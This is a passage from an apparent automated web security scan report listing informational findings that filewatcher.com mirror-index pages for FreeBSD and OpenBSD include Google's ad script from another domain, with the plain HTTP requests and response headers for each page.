User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:00:57 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "t+lTMe/Vu/q2jWMbWEf/TA"
Content-Length: 8511
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:00:57 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 588
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.uni-hannover.de/pub/mirror/b
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.930. http://www.filewatcher.com/b/ftp/ftp.uni-hannover.de/pub/mirror/bsd/FreeBSD/ports/amd64.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /b/ftp/ftp.uni-hannover.de/pub/mirror/bsd/FreeBSD/ports/amd64.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.uni-hannover.de/pub/mirror/bsd/FreeBSD/ports/amd64.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:02 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "F4A0WsJ6se35H2mDeGEdnw"
Content-Length: 9311
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:02 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 611
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.uni-hannover.de/pub/mirror/b
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.931. http://www.filewatcher.com/b/ftp/ftp.uni-hannover.de/pub/mirror/bsd/FreeBSD/ports/amd64/packages-5-stable.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /b/ftp/ftp.uni-hannover.de/pub/mirror/bsd/FreeBSD/ports/amd64/packages-5-stable.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.uni-hannover.de/pub/mirror/bsd/FreeBSD/ports/amd64/packages-5-stable.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:03 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "4KPZtU63nKUbZoh0sOgdKQ"
Content-Length: 26899
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:03 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 612
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.uni-hannover.de/pub/mirror/b
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.932. http://www.filewatcher.com/b/ftp/ftp.uni-hannover.de/pub/mirror/bsd/FreeBSD/ports/amd64/packages-5-stable/All.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /b/ftp/ftp.uni-hannover.de/pub/mirror/bsd/FreeBSD/ports/amd64/packages-5-stable/All.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.uni-hannover.de/pub/mirror/bsd/FreeBSD/ports/amd64/packages-5-stable/All.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:04 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "B9ihc5jTPku4VgkRXu2sPQ"
Content-Length: 36867
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:04 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 612
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.uni-hannover.de/pub/mirror/b
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.933. http://www.filewatcher.com/b/ftp/ftp.uni-hannover.de/pub/mirror/bsd/FreeBSD/ports/i386.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /b/ftp/ftp.uni-hannover.de/pub/mirror/bsd/FreeBSD/ports/i386.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.uni-hannover.de/pub/mirror/bsd/FreeBSD/ports/i386.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:00 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "XgNyngeJ38+4HHKDTXJpLA"
Content-Length: 9975
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:00 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 604
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.uni-hannover.de/pub/mirror/b
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.934. http://www.filewatcher.com/b/ftp/ftp.uni-hannover.de/pub/mirror/bsd/FreeBSD/ports/i386/packages-5-stable.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /b/ftp/ftp.uni-hannover.de/pub/mirror/bsd/FreeBSD/ports/i386/packages-5-stable.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.uni-hannover.de/pub/mirror/bsd/FreeBSD/ports/i386/packages-5-stable.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:01 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "YEIOuiFr2KmVnOo+Ix0mSA"
Content-Length: 26788
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:01 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 605
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.uni-hannover.de/pub/mirror/b
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.935. http://www.filewatcher.com/b/ftp/ftp.uni-hannover.de/pub/mirror/bsd/FreeBSD/ports/i386/packages-5-stable/All.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /b/ftp/ftp.uni-hannover.de/pub/mirror/bsd/FreeBSD/ports/i386/packages-5-stable/All.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.uni-hannover.de/pub/mirror/bsd/FreeBSD/ports/i386/packages-5-stable/All.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:02 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "AKYJ/k8RV8B12KgAp7vrbQ"
Content-Length: 25457
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:02 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 610
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.uni-hannover.de/pub/mirror/b
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.936. http://www.filewatcher.com/b/ftp/ftp.uni-hannover.de/pub/mirror/bsd/FreeBSD/ports/ia64.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /b/ftp/ftp.uni-hannover.de/pub/mirror/bsd/FreeBSD/ports/ia64.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.uni-hannover.de/pub/mirror/bsd/FreeBSD/ports/ia64.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:00:57 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "bstTqpE/X4sNnznlYpvFsQ"
Content-Length: 7188
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:00:57 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 593
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.uni-hannover.de/pub/mirror/b
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.937. http://www.filewatcher.com/b/ftp/ftp.uni-hannover.de/pub/mirror/bsd/FreeBSD/ports/ia64/packages-6-stable.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /b/ftp/ftp.uni-hannover.de/pub/mirror/bsd/FreeBSD/ports/ia64/packages-6-stable.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.uni-hannover.de/pub/mirror/bsd/FreeBSD/ports/ia64/packages-6-stable.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:00:57 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "Wt5lY2/HmDndWCMnJ/i4JA"
Content-Length: 26794
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:00:57 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 595
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.uni-hannover.de/pub/mirror/b
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.938. http://www.filewatcher.com/b/ftp/ftp.uni-hannover.de/pub/mirror/bsd/FreeBSD/ports/ia64/packages-6-stable/All.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /b/ftp/ftp.uni-hannover.de/pub/mirror/bsd/FreeBSD/ports/ia64/packages-6-stable/All.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.uni-hannover.de/pub/mirror/bsd/FreeBSD/ports/ia64/packages-6-stable/All.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:00:58 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "Ythhfh8xcWnTZefvEzFOoQ"
Content-Length: 21993
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:00:58 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 597
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.uni-hannover.de/pub/mirror/b
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.939. http://www.filewatcher.com/b/ftp/ftp.uni-hannover.de/pub/mirror/bsd/FreeBSD/ports/ia64/packages-7-current.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /b/ftp/ftp.uni-hannover.de/pub/mirror/bsd/FreeBSD/ports/ia64/packages-7-current.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.uni-hannover.de/pub/mirror/bsd/FreeBSD/ports/ia64/packages-7-current.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:00:59 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "v/Dobj7JEeTAnbN9jKlt9A"
Content-Length: 26901
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:00:59 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 598
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.uni-hannover.de/pub/mirror/b
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.940. http://www.filewatcher.com/b/ftp/ftp.uni-hannover.de/pub/mirror/bsd/FreeBSD/ports/ia64/packages-7-current/All.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /b/ftp/ftp.uni-hannover.de/pub/mirror/bsd/FreeBSD/ports/ia64/packages-7-current/All.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.uni-hannover.de/pub/mirror/bsd/FreeBSD/ports/ia64/packages-7-current/All.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:00:59 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "ar0wWZSTmRPX5zMXs+9eTw"
Content-Length: 49111
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:00:59 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 603
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.uni-hannover.de/pub/mirror/b
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.941. http://www.filewatcher.com/b/ftp/ftp.uni-hannover.de/pub/mirror/bsd/OpenBSD.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /b/ftp/ftp.uni-hannover.de/pub/mirror/bsd/OpenBSD.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.uni-hannover.de/pub/mirror/bsd/OpenBSD.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:00:48 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "KcmCEbJ1Kd752TO+jGEStQ"
Content-Length: 9040
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:00:48 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 553
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.uni-hannover.de/pub/mirror/b
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.942. http://www.filewatcher.com/b/ftp/ftp.uni-hannover.de/pub/mirror/bsd/OpenBSD/4.2.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /b/ftp/ftp.uni-hannover.de/pub/mirror/bsd/OpenBSD/4.2.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.uni-hannover.de/pub/mirror/bsd/OpenBSD/4.2.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:00:54 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "ic2iNGW8TaHFKGyCI1HoJQ"
Content-Length: 13995
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:00:54 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 555
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.uni-hannover.de/pub/mirror/b
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.943. http://www.filewatcher.com/b/ftp/ftp.uni-hannover.de/pub/mirror/bsd/OpenBSD/4.2/packages.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /b/ftp/ftp.uni-hannover.de/pub/mirror/bsd/OpenBSD/4.2/packages.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.uni-hannover.de/pub/mirror/bsd/OpenBSD/4.2/packages.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:00:55 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "/Xu/3/TqbBldK8o2tQoZTA"
Content-Length: 8586
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:00:55 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 556
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.uni-hannover.de/pub/mirror/b
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.944. http://www.filewatcher.com/b/ftp/ftp.uni-hannover.de/pub/mirror/bsd/OpenBSD/4.2/packages/i386.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /b/ftp/ftp.uni-hannover.de/pub/mirror/bsd/OpenBSD/4.2/packages/i386.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.uni-hannover.de/pub/mirror/bsd/OpenBSD/4.2/packages/i386.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:00:55 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "CeNkzVXPrywNnDLAFK06tA"
Content-Length: 47776
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:00:55 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 564
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.uni-hannover.de/pub/mirror/b
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.945. http://www.filewatcher.com/b/ftp/ftp.uni-hannover.de/pub/mirror/bsd/OpenBSD/4.4.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /b/ftp/ftp.uni-hannover.de/pub/mirror/bsd/OpenBSD/4.4.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.uni-hannover.de/pub/mirror/bsd/OpenBSD/4.4.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
